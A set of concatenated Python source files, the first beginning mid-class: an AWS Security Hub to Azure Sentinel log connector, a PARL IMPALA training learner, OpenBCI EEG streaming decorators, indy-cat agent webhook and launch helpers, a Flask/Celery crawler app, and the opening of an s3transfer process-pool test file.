self.aws_access_key_id = aws_access_key_id
self.aws_secret_acces_key = aws_secret_acces_key
self.aws_region_name = aws_region_name
self.securityhub = boto3.client(
'securityhub',
aws_access_key_id=self.aws_access_key_id,
aws_secret_access_key=self.aws_secret_acces_key,
region_name=self.aws_region_name
)
def freshEventTimestampGenerator(self, freshEventsDuration):
tm = datetime.datetime.utcfromtimestamp(time.time())
return time.mktime((tm - datetime.timedelta(minutes=freshEventsDuration)).timetuple())
# Gets the epoch time of a UTC timestamp in a Security Hub finding
def findingTimestampGenerator(self, finding_time):
d = dateutil.parser.parse(finding_time)
d = d.astimezone(dateutil.tz.tzutc())
return time.mktime(d.timetuple())
# Gets 100 most recent findings from securityhub
def getFindings(self, filters={}):
return self.securityhub.get_findings(
Filters=filters,
MaxResults=100,
SortCriteria=[{"Field": "LastObservedAt", "SortOrder": "desc"}])
# Gets 100 findings from securityhub using the NextToken from a previous request
def getFindingsWithToken(self, token, filters={}):
return self.securityhub.get_findings(
Filters=filters,
NextToken=token,
MaxResults=100,
SortCriteria=[{"Field": "LastObservedAt", "SortOrder": "desc"}]
)
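# Illustrative sketch: the Filters dict follows the Security Hub GetFindings API
# shape; `client` stands for a SecurityHubClient instance and the filter values
# are examples only.
#
#   filters = {'SeverityLabel': [{'Value': 'HIGH', 'Comparison': 'EQUALS'}]}
#   page = client.getFindings(filters)
#   # 'NextToken' is only present when more findings remain.
#   next_page = client.getFindingsWithToken(page['NextToken'], filters)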
class AzureSentinelConnector:
def __init__(self, log_analytics_uri, customer_id, shared_key, log_type, queue_size=200, bulks_number=10, queue_size_bytes=25 * (2**20)):
self.log_analytics_uri = log_analytics_uri
self.customer_id = customer_id
self.shared_key = shared_key
self.log_type = log_type
self.queue_size = queue_size
self.bulks_number = bulks_number
self.queue_size_bytes = queue_size_bytes
self._queue = []
self._bulks_list = []
self.successfull_sent_events_number = 0
self.failed_sent_events_number = 0
self.failedToSend = False
def send(self, event):
self._queue.append(event)
if len(self._queue) >= self.queue_size:
self.flush(force=False)
def flush(self, force=True):
self._bulks_list.append(self._queue)
if force:
self._flush_bulks()
else:
if len(self._bulks_list) >= self.bulks_number:
self._flush_bulks()
self._queue = []
def _flush_bulks(self):
jobs = []
for queue in self._bulks_list:
if queue:
queue_list = self._split_big_request(queue)
for q in queue_list:
jobs.append(Thread(target=self._post_data, args=(self.customer_id, self.shared_key, q, self.log_type, )))
for job in jobs:
job.start()
for job in jobs:
job.join()
self._bulks_list = []
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
self.flush()
def _build_signature(self, customer_id, shared_key, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(customer_id, encoded_hash)
return authorization
def _post_data(self, customer_id, shared_key, body, log_type):
events_number = len(body)
body = json.dumps(body, sort_keys=True)
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
signature = self._build_signature(customer_id, shared_key, rfc1123date, content_length, method, content_type, resource)
uri = self.log_analytics_uri + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': log_type,
'x-ms-date': rfc1123date
}
response = requests.post(uri, data=body, headers=headers)
if (response.status_code >= 200 and response.status_code <= 299):
self.successfull_sent_events_number += events_number
self.failedToSend = False
else:
logging.error("Error during sending events to Azure Sentinel. Response code: {}".format(response.status_code))
self.failed_sent_events_number += events_number
self.failedToSend = True
def _check_size(self, queue):
data_bytes_len = len(json.dumps(queue).encode())
return data_bytes_len < self.queue_size_bytes
def _split_big_request(self, queue):
if self._check_size(queue):
return [queue]
else:
middle = int(len(queue) / 2)
queues_list = [queue[:middle], queue[middle:]]
return self._split_big_request(queues_list[0]) + self._split_big_request(queues_list[1])
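# Illustrative sketch: the connector buffers events and posts them to the Log
# Analytics Data Collector API; leaving the `with` block triggers flush().
#
#   connector = AzureSentinelConnector(logAnalyticsUri, sentinel_customer_id,
#                                      sentinel_shared_key, sentinel_log_type)
#   with connector:
#       connector.send({'Title': 'example finding'})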
|
train.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gym
import numpy as np
import os
import queue
import time
import threading
import parl
from atari_model import AtariModel
from atari_agent import AtariAgent
from parl.env.atari_wrappers import wrap_deepmind
from parl.utils import logger, tensorboard
from parl.utils.scheduler import PiecewiseScheduler
from parl.utils.time_stat import TimeStat
from parl.utils.window_stat import WindowStat
from actor import Actor
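# The Learner below pulls its hyperparameters from a config dict (impala_config
# in __main__). A minimal sketch of the keys it reads, with placeholder values
# chosen only for illustration:
#
#   config = {
#       'env_name': 'PongNoFrameskip-v4', 'env_dim': 42,
#       'sample_queue_max_size': 8, 'sample_batch_steps': 50,
#       'gamma': 0.99, 'vf_loss_coeff': 0.5,
#       'clip_rho_threshold': 1.0, 'clip_pg_rho_threshold': 1.0,
#       'lr_scheduler': [[0, 0.001]], 'entropy_coeff_scheduler': [[0, -0.01]],
#       'train_batch_size': 1000, 'master_address': 'localhost:8010',
#       'actor_num': 4, 'params_broadcast_interval': 5,
#       'get_remote_metrics_interval': 10, 'log_metrics_interval_s': 10,
#   }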
class Learner(object):
def __init__(self, config):
self.config = config
self.sample_data_queue = queue.Queue(
maxsize=config['sample_queue_max_size'])
#=========== Create Agent ==========
env = gym.make(config['env_name'])
env = wrap_deepmind(env, dim=config['env_dim'], obs_format='NCHW')
obs_shape = env.observation_space.shape
act_dim = env.action_space.n
model = AtariModel(act_dim)
algorithm = parl.algorithms.IMPALA(
model,
sample_batch_steps=self.config['sample_batch_steps'],
gamma=self.config['gamma'],
vf_loss_coeff=self.config['vf_loss_coeff'],
clip_rho_threshold=self.config['clip_rho_threshold'],
clip_pg_rho_threshold=self.config['clip_pg_rho_threshold'])
self.agent = AtariAgent(algorithm, obs_shape, act_dim,
self.learn_data_provider)
self.cache_params = self.agent.get_weights()
self.params_lock = threading.Lock()
self.params_updated = False
self.cache_params_sent_cnt = 0
self.total_params_sync = 0
#========== Learner ==========
self.lr, self.entropy_coeff = None, None
self.lr_scheduler = PiecewiseScheduler(config['lr_scheduler'])
self.entropy_coeff_scheduler = PiecewiseScheduler(
config['entropy_coeff_scheduler'])
self.total_loss_stat = WindowStat(100)
self.pi_loss_stat = WindowStat(100)
self.vf_loss_stat = WindowStat(100)
self.entropy_stat = WindowStat(100)
self.kl_stat = WindowStat(100)
self.learn_time_stat = TimeStat(100)
self.start_time = None
self.learn_thread = threading.Thread(target=self.run_learn)
self.learn_thread.setDaemon(True)
self.learn_thread.start()
#========== Remote Actor ===========
self.remote_count = 0
self.batch_buffer = []
self.remote_metrics_queue = queue.Queue()
self.sample_total_steps = 0
self.remote_manager_thread = threading.Thread(
target=self.create_actors)
self.remote_manager_thread.setDaemon(True)
self.remote_manager_thread.start()
def learn_data_provider(self):
""" Data generator for fluid.layers.py_reader
"""
while True:
sample_data = self.sample_data_queue.get()
self.sample_total_steps += sample_data['obs'].shape[0]
self.batch_buffer.append(sample_data)
buffer_size = sum(
[data['obs'].shape[0] for data in self.batch_buffer])
if buffer_size >= self.config['train_batch_size']:
batch = {}
for key in self.batch_buffer[0].keys():
batch[key] = np.concatenate(
[data[key] for data in self.batch_buffer])
self.batch_buffer = []
obs_np = batch['obs'].astype('float32')
actions_np = batch['actions'].astype('int64')
behaviour_logits_np = batch['behaviour_logits'].astype(
'float32')
rewards_np = batch['rewards'].astype('float32')
dones_np = batch['dones'].astype('float32')
self.lr = self.lr_scheduler.step()
self.entropy_coeff = self.entropy_coeff_scheduler.step()
yield [
obs_np, actions_np, behaviour_logits_np, rewards_np,
dones_np, self.lr, self.entropy_coeff
]
def run_learn(self):
""" Learn loop
"""
while True:
with self.learn_time_stat:
total_loss, pi_loss, vf_loss, entropy, kl = self.agent.learn()
self.params_updated = True
self.total_loss_stat.add(total_loss)
self.pi_loss_stat.add(pi_loss)
self.vf_loss_stat.add(vf_loss)
self.entropy_stat.add(entropy)
self.kl_stat.add(kl)
def create_actors(self):
""" Connect to the cluster and start sampling of the remote actor.
"""
parl.connect(self.config['master_address'])
logger.info('Waiting for {} remote actors to connect.'.format(
self.config['actor_num']))
for i in range(self.config['actor_num']):
self.remote_count += 1
logger.info('Remote actor count: {}'.format(self.remote_count))
if self.start_time is None:
self.start_time = time.time()
remote_thread = threading.Thread(target=self.run_remote_sample)
remote_thread.setDaemon(True)
remote_thread.start()
def run_remote_sample(self):
""" Sample data from remote actor and update parameters of remote actor.
"""
remote_actor = Actor(self.config)
cnt = 0
remote_actor.set_weights(self.cache_params)
while True:
batch = remote_actor.sample()
self.sample_data_queue.put(batch)
cnt += 1
if cnt % self.config['get_remote_metrics_interval'] == 0:
metrics = remote_actor.get_metrics()
if metrics:
self.remote_metrics_queue.put(metrics)
self.params_lock.acquire()
if self.params_updated and self.cache_params_sent_cnt >= self.config[
'params_broadcast_interval']:
self.params_updated = False
self.cache_params = self.agent.get_weights()
self.cache_params_sent_cnt = 0
self.cache_params_sent_cnt += 1
self.total_params_sync += 1
self.params_lock.release()
remote_actor.set_weights(self.cache_params)
def log_metrics(self):
""" Log metrics of learner and actors
"""
if self.start_time is None:
return
metrics = []
while True:
try:
metric = self.remote_metrics_queue.get_nowait()
metrics.append(metric)
except queue.Empty:
break
episode_rewards, episode_steps = [], []
for x in metrics:
episode_rewards.extend(x['episode_rewards'])
episode_steps.extend(x['episode_steps'])
max_episode_rewards, mean_episode_rewards, min_episode_rewards, \
max_episode_steps, mean_episode_steps, min_episode_steps =\
None, None, None, None, None, None
if episode_rewards:
mean_episode_rewards = np.mean(np.array(episode_rewards).flatten())
max_episode_rewards = np.max(np.array(episode_rewards).flatten())
min_episode_rewards = np.min(np.array(episode_rewards).flatten())
mean_episode_steps = np.mean(np.array(episode_steps).flatten())
max_episode_steps = np.max(np.array(episode_steps).flatten())
min_episode_steps = np.min(np.array(episode_steps).flatten())
metric = {
'Sample steps': self.sample_total_steps,
'max_episode_rewards': max_episode_rewards,
'mean_episode_rewards': mean_episode_rewards,
'min_episode_rewards': min_episode_rewards,
'max_episode_steps': max_episode_steps,
'mean_episode_steps': mean_episode_steps,
'min_episode_steps': min_episode_steps,
'sample_queue_size': self.sample_data_queue.qsize(),
'total_params_sync': self.total_params_sync,
'cache_params_sent_cnt': self.cache_params_sent_cnt,
'total_loss': self.total_loss_stat.mean,
'pi_loss': self.pi_loss_stat.mean,
'vf_loss': self.vf_loss_stat.mean,
'entropy': self.entropy_stat.mean,
'kl': self.kl_stat.mean,
'learn_time_s': self.learn_time_stat.mean,
'elapsed_time_s': int(time.time() - self.start_time),
'lr': self.lr,
'entropy_coeff': self.entropy_coeff,
}
for key, value in metric.items():
if value is not None:
tensorboard.add_scalar(key, value, self.sample_total_steps)
logger.info(metric)
if __name__ == '__main__':
from impala_config import config
learner = Learner(config)
assert config['log_metrics_interval_s'] > 0
while True:
time.sleep(config['log_metrics_interval_s'])
learner.log_metrics()
|
utils.py
|
"""
=====
Utils
=====
This module defines useful decorators to use with data analysis.
"""
import os
import json
import time
import logging
import random
from datetime import datetime, timedelta
from multiprocessing import Process
from threading import Thread
from typing import Callable
import re
import numpy as np
from openbci_stream.acquisition import OpenBCIConsumer
from ...extensions import properties as prop
class data:
value = {
'context': {},
}
data_tmp_aux_ = None
data_tmp_eeg_ = None
# ----------------------------------------------------------------------
def subprocess_this(fn: Callable) -> Callable:
"""Decorator to move methods to subprocessing."""
def wraper(*args, **kwargs):
c = Process(target=fn, args=args)
c.start()
return wraper
# ----------------------------------------------------------------------
def thread_this(fn: Callable) -> Callable:
"""Decorator to move methods to threading."""
def wraper(*args, **kwargs):
c = Thread(target=fn, args=args)
c.start()
return wraper
# ----------------------------------------------------------------------
def timeit(fn: Callable) -> Callable:
"""Decorator to calculate the execution time of a method."""
def wraper(self, *args, **kwargs):
t0 = time.time()
r = fn(self, *args, **kwargs)
t1 = time.time()
print(f"[timeit] {fn.__name__}: {(t1-t0)*1000:.2f} ms")
return r
return wraper
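# Illustrative usage of the decorators above (class and method names are only
# examples):
#
#   class Analysis:
#       @thread_this
#       def refresh(self):        # runs in a background thread
#           ...
#
#       @timeit
#       def process(self, data):  # prints its own execution time
#           return data.mean()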
# ----------------------------------------------------------------------
def loop_consumer(*topics, package_size=None) -> Callable:
"""Decorator to iterate methods with new streamming data.
This decorator will call a method on every new data streamming input.
"""
global data_tmp_eeg_, data_tmp_aux_, package_size_
topics = list(topics)
if json.loads(os.getenv('BCISTREAM_RASPAD')):
package_size_ = 1000
else:
package_size_ = package_size
def wrap_wrap(fn: Callable) -> Callable:
global data_tmp_eeg_, data_tmp_aux_, package_size_
arguments = fn.__code__.co_varnames[1 : fn.__code__.co_argcount]
def wrap(cls):
global data_tmp_eeg_, data_tmp_aux_, package_size_
if cls._feedback:
topics.append('feedback')
# if cls._package_size:
# package_size_ = cls._package_size
with OpenBCIConsumer(host=prop.HOST, topics=topics) as stream:
frame = 0
for data in stream:
if cls._package_size:
package_size_ = cls._package_size
if data.topic == 'feedback':
feedback = data.value
if (
feedback['name'] == cls._feedback.name
and feedback['mode'] == 'stimuli2analysis'
):
cls._feedback._on_feedback(**feedback)
continue
if data.topic == 'eeg':
frame += 1
if hasattr(cls, 'buffer_eeg_'):
cls.update_buffer(
eeg=data.value['data'],
timestamp=min(
data.value['context']['timestamp.binary']
)
- prop.OFFSET,
)
data_ = data.value['data']
elif data.topic == 'aux':
frame += 1
if hasattr(cls, 'buffer_aux_'):
cls.update_buffer(
aux=data.value['data'],
timestamp=min(
data.value['context']['timestamp.binary']
)
- prop.OFFSET,
)
data_ = data.value['data']
else:
data_ = data.value
# latency calculated with `timestamp.binary`
if data.topic in ['eeg', 'aux']:
latency = (
datetime.now()
- datetime.fromtimestamp(
min(
data.value['context']['timestamp.binary']
)
- prop.OFFSET
)
).total_seconds() * 1000
samples = data.value['context']['sample_ids']
else:
# latency calculated with kafka timestamp
latency = (
datetime.now()
- datetime.fromtimestamp(data.timestamp / 1000)
).total_seconds() * 1000
samples = None
if package_size_ and (data.topic in ['eeg', 'aux']):
if data.topic == 'eeg':
if data_tmp_eeg_ is None:
data_tmp_eeg_ = np.zeros((data_.shape[0], 0))
data_tmp_eeg_ = np.concatenate(
[data_tmp_eeg_, data_], axis=1
)
d = data_tmp_eeg_
elif data.topic == 'aux':
if data_tmp_aux_ is None:
data_tmp_aux_ = np.zeros((data_.shape[0], 0))
data_tmp_aux_ = np.concatenate(
[data_tmp_aux_, data_], axis=1
)
d = data_tmp_aux_
kwargs = {
'data': d,
'kafka_stream': data,
'topic': data.topic,
'frame': frame,
'latency': latency,
'samples': samples,
}
n = package_size_ // prop.STREAMING_PACKAGE_SIZE
if frame % n == 0:
fn(*[cls] + [kwargs[v] for v in arguments])
# else:
if data.topic == 'eeg':
data_tmp_eeg_ = np.zeros((data_.shape[0], 0))
elif data.topic == 'aux':
data_tmp_aux_ = np.zeros((data_.shape[0], 0))
else:
kwargs = {
'data': data_,
'kafka_stream': data,
'topic': data.topic,
'frame': frame,
'latency': latency,
'samples': samples,
}
fn(*[cls] + [kwargs[v] for v in arguments])
return wrap
return wrap_wrap
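# Illustrative usage (sketch): the decorated method runs for every incoming
# Kafka package, and its argument names pick which of the prepared kwargs
# ('data', 'kafka_stream', 'topic', 'frame', 'latency', 'samples') are passed.
#
#   class MyAnalysis:
#       @loop_consumer('eeg', package_size=1000)
#       def stream(self, data, topic, frame, latency):
#           logging.info(f'{topic} frame {frame}: {data.shape} ({latency:.1f} ms)')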
# ----------------------------------------------------------------------
def fake_loop_consumer(*topics, package_size=None) -> Callable:
"""Decorator to iterate methods with new streamming data.
This decorator will call a method with fake data.
"""
# ----------------------------------------------------------------------
def wrap_wrap(fn: Callable) -> Callable:
arguments = fn.__code__.co_varnames[1 : fn.__code__.co_argcount]
def wrap(cls):
frame = 0
while True:
frame += 1
t0 = time.time()
num_data = int(prop.STREAMING_PACKAGE_SIZE)
num_data = random.randint(num_data - 10, num_data + 10)
eeg = 150 * np.random.normal(
0, 0.2, size=(len(prop.CHANNELS), num_data)
)
if prop.BOARDMODE == 'default':
aux = np.random.normal(0, 0.2, size=(3, num_data))
elif prop.BOARDMODE == 'analog':
if prop.CONNECTION == 'wifi':
aux = np.random.normal(0, 0.07, size=(3, num_data))
if (frame // 10) % 2:
aux += 100
else:
aux = np.random.normal(0, 0.07, size=(3, num_data))
if (time.time() // 1) % 2:
aux += 1
elif prop.BOARDMODE == 'digital':
if prop.CONNECTION == 'wifi':
aux = np.random.normal(0, 0.2, size=(3, num_data))
else:
aux = np.random.normal(0, 0.2, size=(5, num_data))
else:
aux = None
data.timestamp = datetime.now().timestamp() * 1000
data.value['timestamp'] = datetime.now()
# data.value['data'] = eeg, aux
if 'eeg' in topics:
if hasattr(cls, 'buffer_eeg'):
cls.update_buffer(
eeg=eeg,
timestamp=data.value['timestamp'].timestamp(),
)
kwargs = {
'data': eeg,
'kafka_stream': data,
'topic': 'eeg',
'frame': frame,
'latency': 0,
}
fn(*[cls] + [kwargs[v] for v in arguments])
if 'aux' in topics:
if hasattr(cls, 'buffer_aux'):
cls.update_buffer(
aux=aux,
timestamp=data.value['timestamp'].timestamp(),
)
kwargs = {
'data': aux,
'kafka_stream': data,
'topic': 'eeg',
'frame': frame,
'latency': 0,
}
fn(*[cls] + [kwargs[v] for v in arguments])
if 'marker' in topics:
if np.random.random() > 0.9:
data.value['timestamp'] = datetime.now()
# data.value['datetime'] = datetime.now()
data.value['context'][
'timestamp.binary'
] = datetime.now()
# data.value['data'] = chr(
# np.random.choice(range(ord('A'), ord('Z') + 1)))
# data.value['data'] = random.choice(
# ['Right', 'Left', 'Up', 'Bottom'])
data.value['marker'] = random.choice(['MARKER'])
kwargs = {
'data': data.value,
'kafka_stream': data,
'topic': 'marker',
'frame': frame,
'latency': 0,
}
fn(*[cls] + [kwargs[v] for v in arguments])
while time.time() < (
t0 + 1 / (prop.SAMPLE_RATE / prop.STREAMING_PACKAGE_SIZE)
):
time.sleep(0.0001)
return wrap
return wrap_wrap
# ----------------------------------------------------------------------
def marker_slicing(markers, t0, t1):
""""""
if isinstance(markers, str):
markers = [markers]
def wrap_wrap(fn):
arguments = fn.__code__.co_varnames[1 : fn.__code__.co_argcount]
def wrap(cls):
cls._target_marker = []
@loop_consumer('aux', 'marker')
def marker_slicing_(cls, topic, data, kafka_stream, latency):
if topic == 'marker':
# if data['marker'] in markers:
# cls._target_marker.append(
# [data['marker'], kafka_stream.value['datetime']])
if any(
[
bool(re.match(mkr, data['marker']))
for mkr in markers
]
):
cls._target_marker.append(
[data['marker'], kafka_stream.value['datetime']]
)
if len(cls._target_marker) < 3:
return
if target := getattr(cls, '_target_marker', False):
# marker, target = target
last_buffer_timestamp = (
cls.buffer_aux_timestamp[-1] - prop.OFFSET
)
last_target_timestamp = (
datetime.fromtimestamp(target[0][1])
+ timedelta(seconds=t1)
).timestamp()
if last_buffer_timestamp > last_target_timestamp:
# if True:
_marker, _target = target.pop(0)
argmin = np.abs(
cls.buffer_aux_timestamp - _target
).argmin()
start = int((prop.SAMPLE_RATE) * t0)
stop = int((prop.SAMPLE_RATE) * t1)
t = cls.buffer_aux_timestamp[
argmin + start : argmin + stop
]
eeg = cls.buffer_eeg_[
:, argmin + start : argmin + stop
]
aux = cls.buffer_aux_[
:, argmin + start : argmin + stop
]
kwargs = {
'eeg': eeg,
'aux': aux,
'timestamp': t,
'marker_datetime': _target,
'marker': _marker,
'latency': latency,
# 'samples': samples,
}
fn(*[cls] + [kwargs[v] for v in arguments])
else:
logging.warning('Date too old to synchronize')
logging.warning(f'Offset: {prop.OFFSET}')
logging.warning(
f'{datetime.fromtimestamp(last_buffer_timestamp), datetime.fromtimestamp(last_target_timestamp)}'
)
marker_slicing_(cls)
return wrap
return wrap_wrap
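# Illustrative usage (sketch): slices the EEG/AUX buffers around every marker
# matching the given patterns, from t0 to t1 seconds relative to the marker.
#
#   class MyAnalysis:
#       @marker_slicing(['Right', 'Left'], t0=-1, t1=3)
#       def epoch(self, eeg, aux, timestamp, marker):
#           ...  # called once per synchronized marker epoch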
|
demo_utils.py
|
import subprocess
import time
import threading
import os
import json
import web
import logging
####################################################
# run background services to receive web hooks
####################################################
# agent webhook callbacks
class webhooks:
def GET(self, topic):
# just for testing; all indy-cat agent hooks are POST requests
s_print("GET: topic=", topic)
return ""
def POST(self, topic):
message = json.loads(web.data())
# dispatch based on the topic type
if topic == "connections":
return self.handle_connections(message["state"], message)
elif topic == "credentials":
return self.handle_credentials(message["state"], message)
elif topic == "presentations":
return self.handle_presentations(message["state"], message)
elif topic == "get-active-menu":
return self.handle_get_active_menu(message)
elif topic == "perform-menu-action":
return self.handle_perform_menu_action(message)
else:
s_print("Callback: topic=", topic, ", message=", message)
return ""
def handle_connections(self, state, message):
conn_id = message["connection_id"]
s_print("Connection: state=", state, ", connection_id=", conn_id)
return ""
def handle_credentials(self, state, message):
credential_exchange_id = message["credential_exchange_id"]
s_print(
"Credential: state=",
state,
", credential_exchange_id=",
credential_exchange_id,
)
return ""
def handle_presentations(self, state, message):
presentation_exchange_id = message["presentation_exchange_id"]
s_print(
"Presentation: state=",
state,
", presentation_exchange_id=",
presentation_exchange_id,
)
return ""
def handle_get_active_menu(self, message):
s_print("Get active menu: message=", message)
return ""
def handle_perform_menu_action(self, message):
s_print("Handle menu action: message=", message)
return ""
def background_hook_service(urls, g_vars):
# run app and respond to agent webhook callbacks (run in background)
# port number has to be the first command line argument
# pass in urls
app = web.application(urls, g_vars)
app.run()
def background_hook_thread(urls, g_vars):
# run app and respond to agent webhook callbacks (run in background)
webhook_thread = threading.Thread(
target=background_hook_service, args=(urls, g_vars)
)
webhook_thread.daemon = True
webhook_thread.start()
print("Web hooks is running!")
return webhook_thread
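# Illustrative usage (sketch): the URL pattern below is only an example; its
# capture group is what web.py passes to webhooks.GET/POST as `topic`.
#
#   urls = ('/webhooks/topic/(.*)/', 'webhooks')
#   webhook_thread = background_hook_thread(urls, globals())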
####################################################
# postgres wallet stuff
####################################################
####################################################
# run indy-cat agent as a sub-process
####################################################
s_print_lock = threading.Lock()
def s_print(*a, **b):
"""Thread safe print function"""
with s_print_lock:
print(*a, **b)
def output_reader(proc):
for line in iter(proc.stdout.readline, b""):
s_print("got line: {0}".format(line.decode("utf-8")), end="")
pass
def stderr_reader(proc):
for line in iter(proc.stderr.readline, b""):
s_print("got line: {0}".format(line.decode("utf-8")), end="")
pass
def write_agent_startup_script(agent_name, agent_args):
cmd = ""
for arg in agent_args:
if '{' in arg:
cmd = cmd + "'" + arg + "' "
else:
cmd = cmd + arg + " "
file2 = open(agent_name,"w+")
file2.write(cmd)
file2.close()
def start_agent_subprocess(agent_name, genesis, seed, endpoint_url, in_port_1, in_port_2, in_port_3, admin_port,
wallet_type, wallet_name, wallet_key, python_path, webhook_url,
scripts_dir, run_subprocess=True):
my_env = os.environ.copy()
my_env["PYTHONPATH"] = python_path
# start and expose a REST callback service
my_env["WEBHOOK_URL"] = webhook_url
print("Webhook url is at", my_env["WEBHOOK_URL"])
# start agent sub-process
agent_args = ['python3', scripts_dir + 'icatagent',
'--inbound-transport', 'http', '0.0.0.0', str(in_port_1),
'--inbound-transport', 'http', '0.0.0.0', str(in_port_2),
'--inbound-transport', 'ws', '0.0.0.0', str(in_port_3),
'--endpoint', endpoint_url,
'--outbound-transport', 'ws',
'--outbound-transport', 'http',
'--genesis-transactions', genesis,
'--auto-respond-messages',
'--accept-invites',
'--accept-requests',
'--auto-ping-connection',
'--wallet-type', wallet_type,
'--wallet-name', wallet_name,
'--wallet-key', wallet_key,
'--seed', seed,
'--admin', '0.0.0.0', str(admin_port),
'--label', agent_name]
use_postgres = False
if use_postgres:
agent_args.extend(['--storage-type', 'postgres_storage',
'--storage-config', '{"url":"localhost:5432","max_connections":5}',
'--storage-creds', '{"account":"postgres","password":"mysecretpassword","admin_account":"postgres","admin_password":"mysecretpassword"}',
])
# what are we doing? write out to a command file
write_agent_startup_script(agent_name + ".sh", agent_args)
if run_subprocess:
# now startup our sub-process
agent_proc = subprocess.Popen(agent_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=my_env)
time.sleep(0.5)
t1 = threading.Thread(target=output_reader, args=(agent_proc,))
t1.start()
t2 = threading.Thread(target=stderr_reader, args=(agent_proc,))
t2.start()
return (agent_proc, t1, t2)
else:
# pause and tell user to manually run script
print("Please run PYTHONPATH=.. ./" + agent_name + ".sh and then hit <enter> to continue")
option = input("Do it!")
return (None, None, None)
|
app.py
|
# from connexion.resolver import RestyResolver
from flask import Flask, render_template
from flask import jsonify
import connexion
from services.bots import Bots
from celery import Celery
import requests
import time
import threading
import os
# Create application instance
# app = connexion.FlaskApp(__name__, specification_dir="swagger/")
# Read the swagger.yml file to configure the endpoints
# app.add_api('api.yaml')
def make_celery(app):
celery = Celery(
app.import_name,
backend=app.config['CELERY_RESULT_BACKEND'],
broker=app.config['CELERY_BROKER_URL']
)
celery.conf.update(app.config)
class ContextTask(celery.Task):
def __call__(self, *args, **kwargs):
with app.app_context():
return self.run(*args, **kwargs)
celery.Task = ContextTask
return celery
app = Flask(__name__, template_folder="templates")
# TODO: add configuration management
app.config.update(
CELERY_BROKER_URL='redis://localhost:6379',
CELERY_RESULT_BACKEND='redis://localhost:6379'
)
# app.config.from_object('yourapplication.default_settings')
# app.config.from_envvar('YOURAPPLICATION_SETTINGS')
# app.config.from_object('configmodule.DevelopmentConfig')
celery = make_celery(app)
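# Illustrative sketch: tasks registered on this Celery instance run inside the
# Flask app context via ContextTask; `add` is only an example task.
#
#   @celery.task()
#   def add(x, y):
#       return x + y
#
#   add.delay(2, 3)  # queued through the Redis broker configured above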
@app.route("/")
def index():
return render_template("index.html")
# return jsonify("Welcome to Helios System")
@celery.task()
@app.before_first_request
@app.route("/v1/start")
def activate_reap():
def reap():
"""
start bot crawling sequence
"""
print ("Initiating Bot Sequence ...")
test_bot = Bots()
test_bot.run_craigbot()
return jsonify(interval="10m", result="SUCCESS")
thread = threading.Thread(target=reap)
thread.start()
def start_runner(running_port):
def start_loop(running_port):
not_started = True
while not_started:
print('In start loop')
try:
print ("checking app running at port {}".format(running_port))
running_url = "http://0.0.0.0:" + str(running_port) + "/"
print ("request sent to {}".format(str(running_url)))
r = requests.get(str(running_url))
print("status code is {}".format(str(r.status_code)))
if r.status_code == 200:
print('Server started, quitting start_loop')
not_started = False
except Exception as e:
print ("Server not yet started, exception: {}".format(str(e)))
time.sleep(2)
print('Started runner')
# need ',' at the end of args to pass as tuple
thread = threading.Thread(target=start_loop, args=(running_port,))
thread.start()
if __name__ == '__main__':
# app = connexion.FlaskApp(__name__, specification_dir="swagger/")
# app.add_api('api.yaml')
# app.add_api('api.yaml', resolver=RestyResolver('api'))
# app.add_api('api.yml')
print('Starting runner')
port = int(os.environ.get('PORT', 5000))
start_runner(port)
app.run(host='0.0.0.0', port=port, debug=True)
|
test_processpool.py
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import os
import queue
import signal
import threading
import time
from io import BytesIO
from botocore.client import BaseClient
from botocore.config import Config
from botocore.exceptions import ClientError, ReadTimeoutError
from s3transfer.constants import PROCESS_USER_AGENT
from s3transfer.exceptions import CancelledError, RetriesExceededError
from s3transfer.processpool import (
SHUTDOWN_SIGNAL,
ClientFactory,
DownloadFileRequest,
GetObjectJob,
GetObjectSubmitter,
GetObjectWorker,
ProcessPoolDownloader,
ProcessPoolTransferFuture,
ProcessPoolTransferMeta,
ProcessTransferConfig,
TransferMonitor,
TransferState,
ignore_ctrl_c,
)
from s3transfer.utils import CallArgs, OSUtils
from tests import (
FileCreator,
StreamWithError,
StubbedClientTest,
mock,
skip_if_windows,
unittest,
)
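# Illustrative sketch of the public API exercised by these tests (bucket, key
# and filename are placeholders):
#
#   with ProcessPoolDownloader() as downloader:
#       future = downloader.download_file('mybucket', 'mykey', 'local-file')
#       future.result()  # blocks until the multi-process download completes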
class RenameFailingOSUtils(OSUtils):
def __init__(self, exception):
self.exception = exception
def rename_file(self, current_filename, new_filename):
raise self.exception
class TestIgnoreCtrlC(unittest.TestCase):
@skip_if_windows('os.kill() with SIGINT not supported on Windows')
def test_ignore_ctrl_c(self):
with ignore_ctrl_c():
try:
os.kill(os.getpid(), signal.SIGINT)
except KeyboardInterrupt:
self.fail(
'The ignore_ctrl_c context manager should have '
'ignored the KeyboardInterrupt exception'
)
class TestProcessPoolDownloader(unittest.TestCase):
def test_uses_client_kwargs(self):
with mock.patch('s3transfer.processpool.ClientFactory') as factory:
ProcessPoolDownloader(client_kwargs={'region_name': 'myregion'})
